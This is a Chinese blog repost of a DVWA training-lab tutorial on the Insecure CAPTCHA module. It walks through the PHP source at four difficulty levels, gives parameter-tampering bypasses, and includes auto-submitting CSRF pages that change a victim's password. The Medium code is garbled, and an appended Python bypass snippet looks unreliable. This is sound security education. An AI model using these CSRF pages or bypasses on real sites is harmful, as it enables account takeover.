DVWA之不安全的验证码(Insecure CAPTCHA)

最新推荐文章于 2025-05-09 14:16:21 发布
最新推荐文章于 2025-05-09 14:16:21 发布
阅读量3.6k 收藏 6
点赞数 1
分类专栏: dvwa 文章标签: dvwa

本文转自:https://www.freebuf.com/articles/web/119692.html

Insecure CAPTCHA

Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。但个人觉得,这一模块的内容叫做不安全的验证流程更妥当些,因为这块主要是验证流程出现了逻辑漏洞,谷歌的验证码表示不背这个锅。

1.png

reCAPTCHA验证流程

这一模块的验证码使用的是Google提供reCAPTCHA服务,下图是验证的具体流程。

1.png

服务器通过调用recaptcha_check_answer函数检查用户输入的正确性。

 

recaptcha_check_answer($privkey,$remoteip, $challenge,$response)

 

 

参数$privkey是服务器申请的private key,$remoteip是用户的ip,$challenge是recaptcha_challenge_field字段的值,来自前端页面 ,$response是recaptcha_response_field字段的值。函数返回ReCaptchaResponse class的实例,ReCaptchaResponse类有2个属性 :

$is_valid是布尔型的,表示校验是否有效,

$error是返回的错误代码。

(ps:有人也许会问,那这个模块的实验是不是需要科学上网呢?答案是不用,因为我们可以绕过验证码)

 

下面对四种级别的代码进行分析。

 

Low

 

服务器端核心代码:

 

<?php 

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) { 
    // Hide the CAPTCHA form 
    $hide_form = true; 

    // Get input 
    $pass_new  = $_POST[ 'password_new' ]; 
    $pass_conf = $_POST[ 'password_conf' ]; 

    // Check CAPTCHA from 3rd party 
    $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ], 
        $_SERVER[ 'REMOTE_ADDR' ], 
        $_POST[ 'recaptcha_challenge_field' ], 
        $_POST[ 'recaptcha_response_field' ] ); 

    // Did the CAPTCHA fail? 
    if( !$resp->is_valid ) { 
        // What happens when the CAPTCHA was entered incorrectly 
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; 
        $hide_form = false; 
        return; 
    } 
    else { 
        // CAPTCHA was correct. Do both new passwords match? 
        if( $pass_new == $pass_conf ) { 
            // Show next stage for the user 
            echo " 
                <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre> 
                <form action=\"#\" method=\"POST\"> 
                    <input type=\"hidden\" name=\"step\" value=\"2\" /> 
                    <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" /> 
                    <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" /> 
                    <input type=\"submit\" name=\"Change\" value=\"Change\" /> 
                </form>"; 
        } 
        else { 
            // Both new passwords do not match. 
            $html     .= "<pre>Both passwords must match.</pre>"; 
            $hide_form = false; 
        } 
    } 
} 

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { 
    // Hide the CAPTCHA form 
    $hide_form = true; 

    // Get input 
    $pass_new  = $_POST[ 'password_new' ]; 
    $pass_conf = $_POST[ 'password_conf' ]; 

    // Check to see if both password match 
    if( $pass_new == $pass_conf ) { 
        // They do! 
        $pass_new = mysql_real_escape_string( $pass_new ); 
        $pass_new = md5( $pass_new ); 

        // Update database 
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
        $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

        // Feedback for the end user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with the passwords matching 
        echo "<pre>Passwords did not match.</pre>"; 
        $hide_form = false; 
    } 

    mysql_close(); 
} 

?> 

 

 

可以看到,服务器将改密操作分成了两步,第一步检查用户输入的验证码,验证通过后,服务器返回表单,第二步客户端提交post请求,服务器完成更改密码的操作。但是,这其中存在明显的逻辑漏洞,服务器仅仅通过检查Change、step 参数来判断用户是否已经输入了正确的验证码。

 

漏洞利用

 

1.通过构造参数绕过验证过程的第一步

 

首先输入密码,点击Change按钮,抓包:

 

1.png

 

(ps:因为没有翻墙,所以没能成功显示验证码,发送的请求包中也就没有recaptcha_challenge_field、recaptcha_response_field两个参数)

 

更改step参数绕过验证码:

 

1.png

 

修改密码成功:

 

1.png

 

2.由于没有任何的防CSRF机制,我们可以轻易地构造攻击页面,页面代码如下(详见CSRF模块的教程)。

 

 

 

<html>

<body onload="document.getElementById('transfer').submit()">

  <div>

    <form method="POST" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/captcha/">

<input type="hidden" name="password_new" value="password">

<input type="hidden" name="password_conf" value="password">

<input type="hidden" name="step" value="2"

<input type="hidden" name="Change" value="Change">

</form>

  </div>

</body>

</html>

 

 

当受害者访问这个页面时,攻击脚本会伪造改密请求发送给服务器。

 

1.png

 

美中不足的是,受害者会看到更改密码成功的界面(这是因为修改密码成功后,服务器会返回302,实现自动跳转),从而意识到自己遭到了攻击。

 

1.png

 

Medium

服务器端核心代码:

 

<?php 

if( isset( $_POST'Change' ] ) && ( $_POST'step' ] == '1' ) ) { 
    // Hide the CAPTCHA form 
    $hide_form = true; 

    // Get input 
    $pass_new  = $_POST'password_new' ]; 
    $pass_conf = $_POST'password_conf' ]; 

    // Check CAPTCHA from 3rd party 
    $resp = recaptcha_check_answer( $_DVWA'recaptcha_private_key' ], 
        $_SERVER'REMOTE_ADDR' ], 
        $_POST'recaptcha_challenge_field' ], 
        $_POST'recaptcha_response_field' ] ); 

    // Did the CAPTCHA fail? 
    if( !$resp->is_valid ) { 
        // What happens when the CAPTCHA was entered incorrectly 
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; 
        $hide_form = false; 
        return; 
    } 
    else { 
        // CAPTCHA was correct. Do both new passwords match? 
        if$pass_new == $pass_conf ) { 
            // Show next stage for the user 
            echo " 
                <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre> 
                <form action=\"#\" method=\"POST\"> 
                    <input type=\"hidden\" name=\"step\" value=\"2\" /> 
                    <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" /> 
                    <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" /> 
                    <input type=\"hidden\" name=\"passed_captcha\" value=\"true\" /> 
                    <input type=\"submit\" name=\"Change\" value=\"Change\" /> 
                </form>"; 
        } 
        else { 
            // Both new passwords do not match. 
            $html     .= "<pre>Both passwords must match.</pre>"; 
            $hide_form = false; 
        } 
    } 
} 

if( isset( $_POST'Change' ] ) && ( $_POST'step' ] == '2' ) ) { 
    // Hide the CAPTCHA form 
    $hide_form = true; 

    // Get input 
    $pass_new  = $_POST'password_new' ]; 
    $pass_conf = $_POST'password_conf' ]; 

    // Check to see if they did stage 1 
    if( !$_POST'passed_captcha' ] ) { 
        $html     .= "<pre><br />You have not passed the CAPTCHA.</pre>"; 
        $hide_form = false; 
        return; 
    } 

    // Check to see if both password match 
    if$pass_new == $pass_conf ) { 
        // They do! 
        $pass_new = mysql_real_escape_string( $pass_new ); 
        $pass_new = md5( $pass_new ); 

        // Update database 
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
        $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

        // Feedback for the end user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with the passwords matching 
        echo "<pre>Passwords did not match.</pre>"; 
        $hide_form = false; 
    } 

    mysql_close(); 
} 

?> 

 

可以看到,Medium级别的代码在第二步验证时,参加了对参数passed_captcha的检查,如果参数值为true,则认为用户已经通过了验证码检查,然而用户依然可以通过伪造参数绕过验证,本质上来说,这与Low级别的验证没有任何区别。

 

漏洞利用

 

1.可以通过抓包,更改step参数,增加passed_captcha参数,绕过验证码。

 

抓到的包:

 

1.png

 

更改之后的包:

 

1.png

 

更改密码成功:

 

1.png

 

2.依然可以实施CSRF攻击,攻击页面代码如下。

 

 

 

<html>

<body onload="document.getElementById('transfer').submit()">

  <div>

    <form method="POST" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/captcha/">

<input type="hidden" name="password_new" value="password">

<input type="hidden" name="password_conf" value="password">

<input type="hidden" name="passed_captcha" value="true">

<input type="hidden" name="step" value="2">

<input type="hidden" name="Change" value="Change">

</form>

  </div>

</body>

</html>

 

 

当受害者访问这个页面时,攻击脚本会伪造改密请求发送给服务器。

 

1.png

 

不过依然会跳转到更改密码成功的界面。

 

1.png

 

High

服务器端核心代码:

 

 

<?php 

if( isset( $_POST[ 'Change' ] ) ) { 
    // Hide the CAPTCHA form 
    $hide_form = true; 

    // Get input 
    $pass_new  = $_POST[ 'password_new' ]; 
    $pass_conf = $_POST[ 'password_conf' ]; 

    // Check CAPTCHA from 3rd party 
    $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ], 
        $_SERVER[ 'REMOTE_ADDR' ], 
        $_POST[ 'recaptcha_challenge_field' ], 
        $_POST[ 'recaptcha_response_field' ] ); 

    // Did the CAPTCHA fail? 
    if( !$resp->is_valid && ( $_POST[ 'recaptcha_response_field' ] != 'hidd3n_valu3' || $_SERVER[ 'HTTP_USER_AGENT' ] != 'reCAPTCHA' ) ) { 
        // What happens when the CAPTCHA was entered incorrectly 
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; 
        $hide_form = false; 
        return; 
    } 
    else { 
        // CAPTCHA was correct. Do both new passwords match? 
        if( $pass_new == $pass_conf ) { 
            $pass_new = mysql_real_escape_string( $pass_new ); 
            $pass_new = md5( $pass_new ); 

            // Update database 
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "' LIMIT 1;"; 
            $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

            // Feedback for user 
            echo "<pre>Password Changed.</pre>"; 
        } 
        else { 
            // Ops. Password mismatch 
            $html     .= "<pre>Both passwords must match.</pre>"; 
            $hide_form = false; 
        } 
    } 

    mysql_close(); 
} 
// Generate Anti-CSRF token 
generateSessionToken(); 

?> 

 

 

可以看到,服务器的验证逻辑是当$resp(这里是指谷歌返回的验证结果)是false,并且参数recaptcha_response_field不等于hidd3n_valu3(或者http包头的User-Agent参数不等于reCAPTCHA)时,就认为验证码输入错误,反之则认为已经通过了验证码的检查。

漏洞利用

搞清楚了验证逻辑,剩下就是伪造绕过了,由于$resp参数我们无法控制,所以重心放在参数recaptcha_response_field、User-Agent上。

第一步依旧是抓包:

1.png

更改参数recaptcha_response_field以及http包头的User-Agent:

1.png

密码修改成功:

1.png

Impossible

服务器端核心代码

 

if( isset( $_POST[ 'Change' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Hide the CAPTCHA form 
    $hide_form = true; 

    // Get input 
    $pass_new  = $_POST[ 'password_new' ]; 
    $pass_new  = stripslashes( $pass_new ); 
    $pass_new  = mysql_real_escape_string( $pass_new ); 
    $pass_new  = md5( $pass_new ); 

    $pass_conf = $_POST[ 'password_conf' ]; 
    $pass_conf = stripslashes( $pass_conf ); 
    $pass_conf = mysql_real_escape_string( $pass_conf ); 
    $pass_conf = md5( $pass_conf ); 

    $pass_curr = $_POST[ 'password_current' ]; 
    $pass_curr = stripslashes( $pass_curr ); 
    $pass_curr = mysql_real_escape_string( $pass_curr ); 
    $pass_curr = md5( $pass_curr ); 

    // Check CAPTCHA from 3rd party 
    $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ], 
        $_SERVER[ 'REMOTE_ADDR' ], 
        $_POST[ 'recaptcha_challenge_field' ], 
        $_POST[ 'recaptcha_response_field' ] ); 

    // Did the CAPTCHA fail? 
    if( !$resp->is_valid ) { 
        // What happens when the CAPTCHA was entered incorrectly 
        echo "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; 
        $hide_form = false; 
        return; 
    } 
    else { 
        // Check that the current password is correct 
        $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); 
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); 
        $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); 
        $data->execute(); 

        // Do both new password match and was the current password correct? 
        if( ( $pass_new == $pass_conf) && ( $data->rowCount() == 1 ) ) { 
            // Update the database 
            $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); 
            $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); 
            $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); 
            $data->execute(); 

            // Feedback for the end user - success! 
            echo "<pre>Password Changed.</pre>"; 
        } 
        else { 
            // Feedback for the end user - failed! 
            echo "<pre>Either your current password is incorrect or the new passwords did not match.<br />Please try again.</pre>"; 
            $hide_form = false; 
        } 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?> 

 

 

可以看到,Impossible级别的代码增加了Anti-CSRF token 机制防御CSRF攻击,利用PDO技术防护sql注入,验证过程终于不再分成两部分了,验证码无法绕过,同时要求用户输入之前的密码,进一步加强了身份认证。

 

1.png

DVWA--Insecure CAPTCHA(安全验证码)(全难度)
wwxxee
02-20 757
DVWAInsecure CAPTCHA(安全验证码) Insecure CAPTCHA,意思是安全验证码CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。 逻辑 这一模块的验证码使用的是Google提供reCAPTCHA服务,下图是验证的具体流程。 服务器通过调用recaptcha_check_answer函数检查用户输入的正确性。
DVWA——Insecure CAPTCHA复现
qq_62056583的博客
07-19 882
CAPTCHA是谷歌提供的一种用户验证服务,即:验证码验证,就是用来区分人类和计算机的一种手段,可以很有效的防止恶意软件、“肉鸡”大量调用系统功能,比如注册、登录等。因为该模块是谷歌提供,需要科学上网,否则我们无法看到具体的页面数据,修改成功,验证码等对于我们常用的brute force(暴力攻击),由于这个时候系统有个严密的验证码机制,此类攻击就无计可施了。但本关中我们的主体思路是基于本关验证过程严谨我们选择绕过验证的方式进行实现。
DVWAInsecure Captcha
谢公子的博客
08-05 5512
Insecure CAPTCHA Insecure CAPTCHA,意思是安全验证码CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。但个人觉得,这一模块的内容叫做安全的验证流程更妥当些,因为这块主要是验证流程出现了逻辑漏洞,谷歌...
DVWA靶场保姆级通关教程--06安全验证机制
最新发布
m0_74020575的博客
05-09 1551
Insecure CAPTCHA 模块的含义是:CAPTCHA 的验证机制存在安全漏洞,可以被攻击者轻松绕过,从而进行自动化攻击(例如暴力破解登录密码)。
DVWA靶场-insecureCAPTCHA
zeroone的博客
03-09 553
第六关:Insecure CAPTCHA安全验证码Insecure CAPTCHA,意思是安全验证码CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。但在DVWA中主要是验证逻辑出现了漏洞 Low <?php if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ]
DVWA靶场-----Insecure CAPTCHA安全验证码
m0_65712192的博客
11-18 1932
DVWA靶场-----Insecure CAPTCHA安全验证码
DVWAInsecure CAPTCHA安全验证码
RexHa的博客
10-03 1706
DVWA 安全验证码
DVWA】--- 六、安全验证码(Insecure CAPTCHA)
qq_43168364的博客
05-31 715
Insecure CAPTCHA 目录 一、说明 由于该模块需要一点健康的东西才可以访问这里就对它每一关的代码审计一下就行了。 二、Low级别 代码审计 相关函数 recaptcha_check_answer()函数:检查用户输入的正确性。 这一关我们只需要抓包改参数 二、medium级别 源码审计 相关函数 ...
DVWA关卡6:Insecure CAPTCHA安全验证码
m0_54899775的博客
12-07 1563
DVWA关卡6:Insecure CAPTCHA安全验证码
DVWA通关攻略之安全验证码
勿山几已
05-22 660
简单介绍安全验证码漏洞及其利用方式
DVWAInsecure CAPTCHA(安全验证码绕过)
shmilyzmy的博客
10-22 1345
low 1.首先在burpsuite中打开代理,即图中的第一步,登录dvwa 2.修改安全等级 ,分析源码 3.返回burpsuite开启代理之后,回到dvwa界面,(切记记住输入的密码)点击change提交,之后再返回burpsuite,可看见服务器返回的表单 检查用户输入的验证码验证码通过后服务器返回表单 客户端提交post请求,服务器完成更改密码的操作 全选后鼠标右击,点击send to repeater medium 前面步骤...
DVWA——Insecure CAPTCHA安全验证码
qq_45780190的博客
05-13 610
DVWA——Insecure CAPTCHA安全验证码验证码最大的作用就是防止攻击者使用工具或者软件自动调用系统功能 就如Captcha的全称所示,他就是用来区分人类和计算机的一种图灵测试,这种做法可以很有效的防止恶意软件、机器人大量调用系统功能:比如注册、登录功能。 我们前面讲到的Brute Force字典式暴力破解,就必须要使用工具大量尝试登录。如果这个时候系统有个严密的验证码机制,此类攻击就无计可施了。 LOW 服务器端核心代码: <?php // 步骤1 if( isset( $_
【工具-DVWADVWA渗透系列六:Insecure CAPTCHA
qqchaozai的专栏
10-24 2304
前言 DVWA安装使用介绍,见:【工具-DVWADVWA的安装和使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Uploa...
dvwa靶场之Insecure CAPTCHA安全验证码
m0_63314341的博客
02-12 4366
刚进去你可能看到这样的报错,这是因为我们没有申请密钥,需要手动输入密钥,我们根据红框提示找到文件添加密钥即可 现在我们来看一下low级别 当我们输入两次密码后他会进行一个验证码校验,验证通过后便会出现四个值,我们可以抓包看一下 我们将step的值改为2后再次发送即可校验通过 下面我们来看一下medium级别 这次变成了五个值,我们依旧是抓包将值改为他所要求的即可 下面我们来看一下high级别 这下加入了$_POST['g-recaptcha-response']...
DVWAInsecure CAPTCHA
baynk的博客
10-29 1142
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ Inse...
DVWA-Insecure CAPTCHA安全验证码
weixin_50342860的博客
08-25 950
目录风险lowmediumhigh修复 风险 是指验证码验证可以被绕过。怎么绕?一般都是验证码的验证和最终修改的验证分离,导致了中间过程(验证码的验证结果)可以被篡改 进入Insecure CAPTCHA 模块,看到需要配置 根据相应的路径,找到文件中下图所示的位置,输入随意值,保存 可刷新页面,正常访问 low <?php if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) { // Hide
DVWA Insecure CAPTCHA
部分学习记录
09-22 313
low 审查源码发现其只是通过对参数change和step的检查来修改密码,可以利用burp抓包绕过 medium 审查源码发现虽然对是否输入验证码进行了检查,但是并未对参数passed_captcha进行检查,可以通过burp将该参数修改为为true·来绕过检测 high 审查源码发现除了验证码以外,如果post提交的参数g-recaptcha-response=hidd3n_valu3且HTTP_USER_AGENT=reCAPTCHA时,同样可以绕过,所以依然可以利用burp抓包修改 ...
DVWA Insecure CAPTCHA安全验证码)全等级
柠檬i的博客
12-19 1153
Insecure CAPTCHA安全验证码) 目录:Insecure CAPTCHA安全验证码)1. Low2.Medium3. High4.Impossible 加载验证码需要向Google申请验证码API。由于大陆地区访问了Google,所以无法获取到验证码,所以需要耐心等待访问Google超时时间才能做本题。 1. Low 可以看到,服务器将改密操作分成了两步,第一步检查用户输入的验证码,验证通过后,服务器返回表单,第二步客户端提交post请求,服务器完成更改密码的操作。但是,这其中存在
Insecure CAPTCHA安全验证码
qq_42176207的博客
05-11 1793
Insecure CAPTCHA Insecure CAPTCHA,意思是安全验证码CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。验证码是没有问题的,关键是代码写的有问题,可以绕过。 环境需要把config.inc.php中的recaptcha_public_key \recaptcha_private_key补充。 reCAPTCHA
DVWA安全的验证
03-23
### 关于 DVWA 无法打开及安全验证解决方案 #### 问题分析 DVWA (Damn Vulnerable Web Application) 是一款用于学习和测试常见 Web 安全漏洞的应用程序。如果遇到 **DVWA cannot open** 或者 **Insecure CAPTCHA** 的问题,可能是由于以下几个原因造成的: 1. 环境配置错误:例如未正确安装 PHP、Apache 或 MySQL 数据库。 2. 缺少必要的 API 密钥:对于某些功能(如 Insecure CAPTCHA),需要手动设置 `recaptcha_key` 值[^2]。 3. 验证码机制被绕过或未正常加载。 以下是针对这些问题的具体解决方法。 --- #### 解决方案 ##### 一、DVWA 无法打开的原因排查与修复 当尝试访问 DVWA 页面时显示空白页或其他错误信息,通常是因为以下原因之一: - **PHP/Apache/MySQL 配置问题** 如果服务器端组件未正确启动或者版本兼容性存在问题,则可能导致页面无法渲染。可以通过检查日志文件来定位具体错误位置。例如,在 Linux 下查看 Apache 错误日志命令如下所示: ```bash tail -f /var/log/apache2/error.log ``` - **数据库连接失败** 若应用程序未能成功连接到后台数据库,也会引发类似的异常情况。确保已按照官方文档完成初始化脚本运行操作,并确认用户名密码匹配无误[^5]。 ##### 二、关于 Insecure CAPTCHA 的处理方式 此模块主要演示如何通过简单的逻辑缺陷绕过验证码校验流程。下面介绍两种常见的应对策略: 1. **直接跳过验证环节** 在低难度模式下,系统并未严格实施二次核对手续;因此只需提交表单而理会图像上的字符即可达成目标效果[^4]。 2. **伪造合法请求参数** 利用浏览器开发者工具观察网络通信记录,发现每次刷新都会附带一个新的 token 字符串作为隐藏域传递给服务器端。如果我们能够截获并重放这些动态生成的数据包内容,则同样有机会突破防线限制[^1]。 另外需要注意的是,实际部署过程中可能会因为防火墙规则等原因造成外部资源加载受阻现象发生(比如 reCaptcha v2),此时建议切换至离线模拟环境继续练习[^3]。 --- ```python import requests url = 'http://localhost/dvwa/vulnerabilities/captcha/' data = { 'captcha': '', # Leave it empty to bypass the check. 'Login': 'Login' } response = requests.post(url, data=data) if response.status_code == 200 and "Welcome" in response.text: print("Successfully logged in by skipping captcha.") else: print("Failed attempt at logging without entering a valid code.") ``` 上述代码片段展示了如何向存在漏洞的服务发送 POST 请求以规避图形检验措施的影响。 --- #### 总结 综上所述,要彻底解决问题需从基础架构层面入手逐一排除干扰因素直至恢复正常运作状态为止;而对于特定场景下的挑战项目则应灵活运用所学知识寻找捷径快速通关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值